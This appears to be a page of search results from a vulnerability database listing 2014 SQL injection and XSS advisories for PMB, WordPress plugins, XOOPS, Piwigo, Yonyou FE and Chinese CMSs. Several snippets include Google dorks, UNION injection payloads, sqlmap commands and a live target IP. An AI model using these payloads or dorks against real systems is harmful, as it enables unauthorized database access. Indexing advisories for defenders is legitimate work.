737 matches found

exploitpack
added 2014/12/27 12:0 a.m., 19 views

PMB 4.1.3 - (Authenticated) SQL Injection

PMB 4.1.3 - Authenticated SQL Injection Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link:...

0.4 AI score
Exploits: 0
Packet Storm
added 2014/12/26 12:0 a.m., 31 views

PMB 4.1.3 SQL Injection

Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files...

0.1 AI score
Exploits: 0
seebug.org
added 2014/12/08 12:0 a.m., 57 views

Wordpress wpDataTables Plugin 1.5.3 /wpdatatables.php SQL injection vulnerability

wpdatatables.php // AJAX-handlers addaction 'wpajaxgetwdtable', 'wdtgetajaxdata' ; addaction 'wpajaxnoprivgetwdtable', 'wdtgetajaxdata' ; / Handler which returns the AJAX response / function wdtgetajaxdata $id = $GET'tableid'; $tabledata = wdtgettablebyid $id ; $columndata = wdtgetcolumnsbytablei...

7.1 AI score
Exploits: 0
seebug.org
added 2014/12/05 12:0 a.m., 35 views

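Generic SQL injection in a library catalog search system

Brief description: A library catalog search system has a generic SQL injection. Details: The Huiwen (汇文) library catalog search system has a SQL injection; the injection point is doctype. Google search keyword: inurl:/opac/search.php; the affected scope is large. 1. Visiting http://120.195.143.181:9090/opac/search.php shows that the search takes several parameters, so the request was captured on submit. GET...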

7.1 AI score
Exploits: 0
Kitploit
added 2014/12/01 10:18 p.m., 22 views

Samurai Web Testing Framework 3.0 - LiveCD Web Pen-testing Environment

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best...

7 AI score
Exploits: 0
seebug.org
added 2014/11/27 12:0 a.m., 48 views

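Jiayuan (嘉缘) talent system: one SQL injection #6 (demo test)

Brief description: One time-based blind injection in the Jiayuan (嘉缘) talent system. Demo test: http://v2014.rccms.com/ Details: The SQL injection is on the page http://v2014.rccms.com/member/index.php?m=personinterview&show=works, in the delete-interview-notice function. First, look at the code: /member/personinterview.php 11 if$do=='del' 12 $checks=$POST'checks'; 13 $db -query"delete from $cfg'tbpre'myinterview where...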

7 AI score
Exploits: 0
seebug.org
added 2014/11/25 12:0 a.m., 17 views

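An injection in the latest version of phpok

Brief description: There have not been many code-audit vulnerabilities lately, so here is a front-end one. Details: phpok latest version 20141119. Affected file: /framework/model/data.php // still the same old problem // get the article list public function arclist$rs Lines 102-105: if$rs'userid' $sql.= "AND l.userid IN".$rs'userid'." "; $rs'userid' goes straight into the query, which causes the injection. Now it is a matter of finding where it is used: function arclist comes from function arclist. Looking for arclist, there are 2 places in total; one does not work and the other one can...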

7.1 AI score
Exploits: 0
Exploit DB
added 2014/11/24 12:0 a.m., 22 views

WordPress Plugin wpDataTables 1.5.3 - SQL Injection

Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap 0.8-1 Linux / Mozilla Firefox Linux / sqlmap...

7.4 AI score
Exploits: 0
0day.today
added 2014/11/23 12:0 a.m., 23 views

Wordpress wpDataTables 1.5.3 SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap...

7.1 AI score
Exploits: 0
Packet Storm
added 2014/11/23 12:0 a.m., 19 views

WordPress wpDataTables 1.5.3 SQL Injection

Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap 0.8-1 Linux / Mozilla Firefox Linux / sqlmap...

0.1 AI score
Exploits: 0
0day.today
added 2014/11/18 12:0 a.m., 32 views

XOOPS 2.5.6 blind SQL Injection Vulnerability

XOOPS versions 2.5.6 and below suffer from a remote blind SQL injection vulnerability. I. VULNERABILITY ------------------------- Blind SQL Injection in XOOPS 5.0.11 AND time-based blind comment' injectable INFO POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or HAVING clause MySQL...

8.1 AI score
Exploits: 0
exploitpack
added 2014/11/13 12:0 a.m., 16 views

Piwigo 2.6.0 - picture.php?rate SQL Injection

Piwigo 2.6.0 - picture.php?rate SQL Injection ============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score...

0.3 AI score
Exploits: 0
exploitpack
added 2014/11/13 12:0 a.m., 29 views

Joomla! Component com_hdflvplayer 2.1.0.1 - SQL Injection

Joomla! Component com_hdflvplayer 2.1.0.1 - SQL Injection #!/usr/bin/python Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://www.hdflvplayer.net/ Software Link : http://www.hdflvplayer.net/downloadcount.php?pid=5 Dork google 1:...

0.3 AI score
Exploits: 0
Packet Storm
added 2014/11/12 12:0 a.m., 29 views

Piwigo 2.6.0 SQL Injection

============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score ============================================= I. VULNERABILITY...

0.2 AI score
Exploits: 0
seebug.org
added 2014/11/03 12:0 a.m., 27 views

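Yonyou FE collaborative office system SQL injection vulnerability (1)

Brief description: Insufficient filtering at one point in the Yonyou FE collaborative office system leads to a SQL injection vulnerability. Details: Insufficient filtering at one point in the Yonyou FE collaborative office system leads to a SQL injection vulnerability that allows direct UNION injection. Injection URL: /sys/treeXml.jsp?Si06=1&type=sort Injection parameter: Si06 Payload: Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap command: python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06...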

7.5 AI score
Exploits: 0
seebug.org
added 2014/11/01 12:0 a.m., 26 views

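Dami CMS (大米CMS): blind SQL injection #2

Brief description: Second blind SQL injection in Dami CMS; the database can be dumped directly. Details: File /Web/Lib/Action/ApiAction.class.php // universal data-retrieval interface function ajaxarclist $prefix = !empty$REQUEST'prefix'?bool$REQUEST'prefix':true; // table filter to prevent information leaks; only the allowed tables if!inarray$REQUEST'model',array'article','type','ad','label','link'exit; if!empty$REQUEST'model' if$prefix == true...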

7.1 AI score
Exploits: 0
myhack58
added 2014/10/31 12:0 a.m., 27 views

Etiko CMS index.php cross-site scripting vulnerability - vulnerability warning - the black bar safety net

Affected system: Etiko Etiko CMS Description: CVE (CAN) ID: CVE-2014-8505 Etiko CMS is a content management system. Etiko CMS does not effectively validate input to the index.php script, and its implementation therefore contains a cross-site scripting vulnerability; a remote attacker with the structure o...

7.6 AI score
Exploits: 0
seebug.org
added 2014/10/30 12:0 a.m., 14 views

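Yonyou FE collaborative office system SQL injection vulnerability

Brief description: As in the title. Details: Insufficient filtering at one point in the Yonyou FE collaborative office system leads to a SQL injection vulnerability that allows direct UNION injection. Injection URL: /system/config/deptTreeXml.jsp?type=group&SG04=1 Injection parameter: SG04 Payload: SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- Sqlmap injection: python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1...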

7.5 AI score
Exploits: 0
exploitpack
added 2014/10/27 12:0 a.m., 16 views

WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection

WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip Date : 2014-10-23 Tested on : Windows...

0.4 AI score
Exploits: 0
0day.today
added 2014/10/24 12:0 a.m., 21 views

WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability

WordPress CP Multi View Event Calendar plugin version 1.01 suffers from a remote SQL injection vulnerability. Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link :...

8.1 AI score
Exploits: 0